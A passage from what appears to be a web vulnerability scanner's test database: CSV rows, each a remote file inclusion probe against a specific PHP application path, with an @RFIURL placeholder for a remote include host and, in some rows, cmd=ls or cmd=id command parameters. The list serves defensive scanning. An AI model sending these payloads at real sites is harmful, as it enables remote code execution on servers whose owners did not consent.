(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005603\",\"5292\",\"c\",\"/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005604\",\"5292\",\"c\",\"/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005605\",\"5292\",\"c\",\"/phpyabs/moduli/libri/index.php?Azione=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005606\",\"5292\",\"c\",\"/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005607\",\"5292\",\"c\",\"/playlist.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005608\",\"5292\",\"c\",\"/plugin/HP_DEV/cms2.php?s_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005609\",\"5292\",\"c\",\"/plugin/HP_DEV/cms2.php?s_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005610\",\"5292\",\"c\",\"/plugin/gateway/gnokii/init.php?apps_path[plug]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005611\",\"5292\",\"c\",\"/plugins/1_Adressbuch/delete.php?folder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005612\",\"5292\",\"c\",\"/plugins/BackUp/Archive.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005613\",\"5292\",\"c\",\"/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005614\",\"5292\",\"c\",\"/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005615\",\"5292\",\"c\",\"/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005616\",\"5292\",\"c\",\"/plugins/links/functions.inc?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005617\",\"5292\",\"c\",\"/plugins/polls/functions.inc?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005618\",\"5292\",\"c\",\"/plugins/rss_importer_functions.php?sitepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005619\",\"5292\",\"c\",\"/plugins/safehtml/HTMLSax3.php?dir[plugins]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005620\",\"5292\",\"c\",\"/plugins/safehtml/safehtml.php?dir[plugins]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005621\",\"5292\",\"c\",\"/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005622\",\"5292\",\"c\",\"/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005623\",\"5292\",\"c\",\"/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005624\",\"5292\",\"c\",\"/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005625\",\"5292\",\"c\",\"/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005626\",\"5292\",\"c\",\"/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005627\",\"5292\",\"c\",\"/plugins/spamx/Import.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005628\",\"5292\",\"c\",\"/plugins/spamx/LogView.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005629\",\"5292\",\"c\",\"/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005630\",\"5292\",\"c\",\"/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005631\",\"5292\",\"c\",\"/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005632\",\"5292\",\"c\",\"/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005633\",\"5292\",\"c\",\"/plugins/staticpages/functions.inc?_CONF[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005634\",\"5292\",\"c\",\"/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005635\",\"5292\",\"c\",\"/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005636\",\"5292\",\"c\",\"/plus.php?_pages_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005637\",\"5292\",\"c\",\"/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005638\",\"5292\",\"c\",\"/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005639\",\"5292\",\"c\",\"/pmi_v28/Includes/global.inc.php?strIncludePrefix=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005640\",\"5292\",\"c\",\"/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005641\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005642\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005643\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005644\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005645\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005646\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005647\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005648\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/login.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005649\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005650\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005651\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005652\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005653\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005654\",\"5292\",\"c\",\"/podcastgen1.0beta2/core/recent_list.php?absoluteurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005655\",\"5292\",\"c\",\"/poll/view.php?int_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005656\",\"5292\",\"c\",\"/pollvote.php?pollname=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005657\",\"5292\",\"c\",\"/pop.php?base=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005658\",\"5292\",\"c\",\"/popup_window.php?site_isp_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005659\",\"5292\",\"c\",\"/popup_window.php?site_isp_root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005660\",\"5292\",\"c\",\"/port.php?content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005661\",\"5292\",\"c\",\"/portal/includes/portal_block.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005662\",\"5292\",\"c\",\"/portal/portal.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005663\",\"5292\",\"c\",\"/portfolio.php?id=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005664\",\"5292\",\"c\",\"/portfolio/commentaires/derniers_commentaires.php?rep=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005665\",\"5292\",\"c\",\"/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005666\",\"5292\",\"c\",\"/prepare.php?xcart_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005667\",\"5292\",\"c\",\"/prepare.php?xcart_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005668\",\"5292\",\"c\",\"/prepend.php?_PX_config[manager_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005669\",\"5292\",\"c\",\"/preview.php?php_script_path=@RFIURL?&cmd=dir\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005670\",\"5292\",\"c\",\"/principal.php?conteudo=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005671\",\"5292\",\"c\",\"/print.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005672\",\"5292\",\"c\",\"/print.php?pager=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005673\",\"5292\",\"c\",\"/print.php?print=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005674\",\"5292\",\"c\",\"/process.php?DEFAULT_SKIN=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005675\",\"5292\",\"c\",\"/professeurs/index.php?repertoire_config=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005676\",\"5292\",\"c\",\"/profil.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005677\",\"5292\",\"c\",\"/projects/weatimages/demo/index.php?ini[langpack]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005678\",\"5292\",\"c\",\"/promocms/newspublish/include.php?path[bdocroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005679\",\"5292\",\"c\",\"/protection.php?logout_page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005680\",\"5292\",\"c\",\"/provider/auth.php?xcart_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005681\",\"5292\",\"c\",\"/provider/auth.php?xcart_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005682\",\"5292\",\"c\",\"/psynch/nph-psa.exe?css=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005683\",\"5292\",\"c\",\"/psynch/nph-psf.exe?css=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005684\",\"5292\",\"c\",\"/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005685\",\"5292\",\"c\",\"/public_html/modules/Forums/favorites.php?nuke_bb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005686\",\"5292\",\"c\",\"/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005687\",\"5292\",\"c\",\"/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005688\",\"5292\",\"c\",\"/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005689\",\"5292\",\"c\",\"/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005690\",\"5292\",\"c\",\"/qte_web.php?qte_web_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005691\",\"5292\",\"c\",\"/quick_reply.php?phpbb_root_path=@RFIURL&mode=[file]\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005692\",\"5292\",\"c\",\"/quickie.php?QUICK_PATH=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005693\",\"5292\",\"c\",\"/random2.php?path_to_folder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005694\",\"5292\",\"c\",\"/randshop/index.php?incl=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005695\",\"5292\",\"c\",\"/rdf.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005696\",\"5292\",\"c\",\"/reactivate.php?base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005697\",\"5292\",\"c\",\"/read.php?data=@RFIURL? \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005698\",\"5292\",\"c\",\"/readmore.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005699\",\"5292\",\"c\",\"/recent.php?insPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005700\",\"5292\",\"c\",\"/rechnung.php?_PHPLIB[libdir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005701\",\"5292\",\"c\",\"/reconfig.php?GLOBALS[CLPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005702\",\"5292\",\"c\",\"/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005703\",\"5292\",\"c\",\"/redirect.php?url=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005704\",\"5292\",\"c\",\"/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005705\",\"5292\",\"c\",\"/register.php?base_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005706\",\"5292\",\"c\",\"/releasenote.php?mosConfig_absolute_path=@RFIURL \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005707\",\"5292\",\"c\",\"/rempass.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005708\",\"5292\",\"c\",\"/report.php?scriptpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005709\",\"5292\",\"c\",\"/reports/who_r.php?bj=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005710\",\"5292\",\"c\",\"/resources/includes/class.Smarty.php?cfg[sys][base_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005711\",\"5292\",\"c\",\"/ressourcen/dbopen.php?home=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005712\",\"5292\",\"c\",\"/robotstats.inc.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005713\",\"5292\",\"c\",\"/root/public/code/cp_html2txt.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005714\",\"5292\",\"c\",\"/routines/fieldValidation.php?jssShopFileSystem=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005715\",\"5292\",\"c\",\"/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005716\",\"5292\",\"c\",\"/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL?\",\"GET\",\"PHP 